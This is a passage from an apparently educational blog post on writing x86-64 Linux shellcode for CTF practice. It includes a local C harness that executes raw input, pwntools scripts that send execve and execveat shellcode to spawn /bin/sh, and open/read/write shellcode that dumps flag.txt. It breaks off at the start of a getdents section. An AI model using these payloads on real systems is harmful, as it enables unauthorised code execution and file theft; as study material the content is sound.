operator\">=</span> <span class=\"token function\">mmap</span><span class=\"token punctuation\">(</span><span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">,</span> PROT_READ <span class=\"token operator\">|</span> PROT_WRITE <span class=\"token operator\">|</span> PROT_EXEC<span class=\"token punctuation\">,</span> MAP_ANON <span class=\"token operator\">|</span> MAP_PRIVATE<span class=\"token punctuation\">,</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>exec_mem <span class=\"token operator\">==</span> MAP_FAILED<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"mmap\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">char</span> binsh<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"/bin/sh\"</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"System: %p\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">*</span>system<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"binsh: %p\\n\"</span><span class=\"token punctuation\">,</span> binsh<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Enter machine code:\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">char</span> input<span class=\"token punctuation\">[</span><span class=\"token number\">4096</span><span class=\"token punctuation\">]</span><span class=\"token 
punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"fgets\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">munmap</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">memcpy</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">,</span> input<span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">asm</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"jmp *%0\"</span> <span class=\"token operator\">::</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">munmap</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Sending Shell Code to this compiled binary embeds the Shell Code in memory and executes it.</p>\n<p>The following Python script can be used for testing:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\ncontext<span class=\"token punctuation\">.</span>log_level <span class=\"token operator\">=</span> <span class=\"token string\">\"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *(main+389)\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./a.out\"</span>\nexe <span class=\"token operator\">=</span> 
ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\"># target = remote(\"address\", port)</span>\n    target <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"System:\"</span><span class=\"token punctuation\">)</span>\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"binsh:\"</span><span class=\"token punctuation\">)</span>\nbinsh_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rdi, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>binsh_addr<span class=\"token punctuation\">}</span></span><span class=\"token string\">\nmov rsi, 0\nmov rdx, 0\nmov rax, 59\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">with</span> 
<span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./payload\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This code sends the Shell Code that uses <code class=\"language-text\">execve</code> to get a shell, as created in this section.</p>\n<p>Running it confirms that the following instruction sequence is executed and a shell is launched:</p>\n<p><img src=\"/static/26955300ad2a150642dde554ce1ac88c/96e92/image-20240626202459269.png\" alt=\"image-20240626202459269\"></p>\n<h3 id=\"executing-a-program-with-execveat\" style=\"position:relative;\"><a href=\"#executing-a-program-with-execveat\" aria-label=\"executing a program with execveat permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Executing a Program with execveat</h3>\n<p>Let’s create Shell Code that executes a program using <code class=\"language-text\">execveat</code>.</p>\n<p><code class=\"language-text\">execveat</code> takes the path to an executable as its second
argument.</p>\n<p>If this path is an absolute path, the first argument <code class=\"language-text\">dirfd</code> is ignored and can be set arbitrarily.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/fcntl.h></span>      <span class=\"token comment\">/* Definition of AT_* constants */</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">execveat</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> dirfd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>pathname<span class=\"token punctuation\">,</span>\n            <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token keyword\">const</span> _Nullable argv<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token keyword\">const</span> _Nullable envp<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/execveat.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">execveat(2) - 
Linux manual page</a></p>\n<p>I created the following Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">322</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">rsi</span>, {binsh_addr}\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">r10</span>, <span class=\"token number\">0</span>\nxor <span class=\"token register variable\">r8</span>, <span class=\"token register variable\">r8</span>\nsyscall</code></pre></div>\n<p>Sending this to the test program as Shell Code successfully obtained a shell:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">shellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rax, 322\nmov rdi, 0\nmov rsi, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>binsh_addr<span class=\"token punctuation\">}</span></span><span class=\"token string\">\nmov rdx, 0\nmov r10, 0\nxor r8, r8\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><img src=\"/static/19ce69109759c1f9086e25b4115be66b/7e509/image-20240626204219748.png\" alt=\"image-20240626204219748\"></p>\n<h3 id=\"reading-and-printing-file-contents-with-openreadwrite\" style=\"position:relative;\"><a href=\"#reading-and-printing-file-contents-with-openreadwrite\"
aria-label=\"reading and printing file contents with openreadwrite permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Reading and Printing File Contents with open/read/write</h3>\n<p>Next, I’ll implement Shell Code that reads data from a file on the system and returns it to stdout — not executing a program.</p>\n<p>To access file data, first open the file descriptor using <code class=\"language-text\">open</code>.</p>\n<p><code class=\"language-text\">open</code> takes the file path as its first argument.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;fcntl.h></span></span>\n<span class=\"token keyword\">int</span> <span class=\"token function\">open</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>pathname<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n    <span class=\"token comment\">/* mode_t mode */</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a 
href=\"https://man7.org/linux/man-pages/man2/open.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">open(2) - Linux manual page</a></p>\n<p>For example, the following is Shell Code that pushes a hardcoded file name onto the stack and obtains the file descriptor via <code class=\"language-text\">open</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">0x7478742e67616c66</span> <span class=\"token comment\">; flag.txt</span>\npush <span class=\"token number\">0x0</span>\npush <span class=\"token register variable\">rax</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">2</span> <span class=\"token comment\">; open</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>\nsyscall</code></pre></div>\n<p>The file path can also be obtained by other means or pre-loaded onto the stack.</p>\n<p>Remember to insert a NULL byte at the end.</p>\n<p>The file descriptor obtained by this system call is held in RAX.</p>\n<p>Next, use <code class=\"language-text\">read</code> to store the file data in a buffer:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> 
<span class=\"token keyword\">void</span> buf<span class=\"token punctuation\">[</span><span class=\"token punctuation\">.</span>count<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> count<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>I wrote the following assembly to read file data.</p>\n<p>This code reads 20 bytes from the file descriptor into the stack:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rax</span> <span class=\"token comment\">; file descriptor as first argument</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">0</span> <span class=\"token comment\">; read</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token register variable\">rsp</span> <span class=\"token comment\">; use the stack as the buffer for now</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">20</span>\nsyscall</code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/read.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">read(2) - Linux manual page</a></p>\n<p>Finally, use <code class=\"language-text\">write</code> to return the read string to stdout:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">write</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span 
class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">void</span> buf<span class=\"token punctuation\">[</span><span class=\"token punctuation\">.</span>count<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> count<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Use the following assembly code (file descriptor 1 is stdout):</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">1</span> <span class=\"token comment\">; write</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token number\">1</span> <span class=\"token comment\">; stdout</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">20</span>\nsyscall</code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/write.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">write(2) - Linux manual page</a></p>\n<p>Note that <code class=\"language-text\">read</code> leaves the number of bytes it actually read in RAX. Hardcoding 20 for both calls is fine for a short flag in a test program, but a more robust version saves that count (for example with <code class=\"language-text\">mov rdx, rax</code> right after the read) so that the length passed to <code class=\"language-text\">write</code> matches the data that was read.</p>\n<p>The script to send this to the test program is as follows:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token 
punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./run_shellcode.bin\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\ntarget <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"System:\"</span><span class=\"token punctuation\">)</span>\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"binsh:\"</span><span class=\"token punctuation\">)</span>\nbinsh_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nstack_addr <span class=\"token operator\">=</span> binsh_addr\nfile_name <span class=\"token operator\">=</span> <span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">\"utf-8\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rax, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>file_name<span class=\"token punctuation\">}</span></span><span class=\"token string\">\npush 0x0\npush rax\nmov rax, 2\nmov rdi, rsp\nmov rsi, 0\nmov rdx, 0\nsyscall\n\nmov rdi, rax\nmov rax, 0\nmov rsi, rsp\nmov rdx, 
20\nsyscall\n\nmov rax, 1\nmov rdi, 1\nmov rsi, rsp\nmov rdx, 20\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this script outputs the contents of <code class=\"language-text\">flag.txt</code> via the created Shell Code:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 782px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f0f4b283481f2633f91364a19619a9a4/2e195/image-20240626220452807.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 32.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+klEQVQY05WQ226DMBBEDZhAQOXiuiENEGMTEhLaqv//c6dOovah7UseRjsr7R6NRuhdhT3vcOcWO7XMl3fm5dPrAzNO7N1EZ6z3x9v+2hn6wXI4OMxgcM5i7UBRPCGEQAQiZLksqEqTZDHtQdG4HN0UyCi6Hz2iMAzYm94/S8K1YL0VZK0gSMXjsKuKqsCNlmbb+FQ+XacY5h1Kl5RliXpWt1lWJXmek6QJdV1Rq/p/4Hk+cTxNjNdOjGEcR5blja7vvXd+dh5Qo7VGv2gPL25+s9mQZdlf4L5pSNcpQRAQyYg4jomikDC8K/I9SimRsWS1Wv3s3/438AvKT4qpZCWVBAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              
srcset=\"/static/f0f4b283481f2633f91364a19619a9a4/8ac56/image-20240626220452807.webp 240w,\n/static/f0f4b283481f2633f91364a19619a9a4/d3be9/image-20240626220452807.webp 480w,\n/static/f0f4b283481f2633f91364a19619a9a4/c0b7e/image-20240626220452807.webp 782w\"\n              sizes=\"(max-width: 782px) 100vw, 782px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f0f4b283481f2633f91364a19619a9a4/8ff5a/image-20240626220452807.png 240w,\n/static/f0f4b283481f2633f91364a19619a9a4/e85cb/image-20240626220452807.png 480w,\n/static/f0f4b283481f2633f91364a19619a9a4/2e195/image-20240626220452807.png 782w\"\n            sizes=\"(max-width: 782px) 100vw, 782px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f0f4b283481f2633f91364a19619a9a4/2e195/image-20240626220452807.png\"\n            alt=\"image-20240626220452807\"\n            title=\"image-20240626220452807\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"browsing-directory-entries-with-getdents\" style=\"position:relative;\"><a href=\"#browsing-directory-entries-with-getdents\" aria-label=\"browsing directory entries with getdents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Browsing Directory Entries with getdents</h3>\n<p>In the previous section 
I created Shell Code that reads and outputs a file given its path, but when the file name is unknown, we need to enumerate the directory.</p>\n<p>In that case, <code class=\"language-text\">getdents</code> (or <code class=\"language-text\">getdents64</code>, syscall number 217 on x86-64, which returns <code class=\"language-text\">struct linux_dirent64</code> records instead of <code class=\"language-text\">struct linux_dirent</code>) can be used:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">int</span> <span class=\"token function\">getdents</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">linux_dirent</span> <span class=\"token operator\">*</span>dirp<span class=\"token punctuation\">,</span>\n             <span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">int</span> count<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://linux.die.net/man/2/getdents64\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">getdents64(2): directory entries - Linux man page</a></p>\n<p>Both calls fill the buffer with variable-length records, each carrying an inode number, an offset cookie, the record length, the entry type and the NUL-terminated name (the field order differs slightly between the two structs), and return the number of bytes written in RAX, or 0 at the end of the directory. Dumping the buffer straight to stdout therefore shows the names interleaved with binary header bytes, which is still enough to read them off in a terminal.</p>\n<p><code class=\"language-text\">getdents64</code> can be called using the following Shell Code.</p>\n<p>First, obtain the directory file 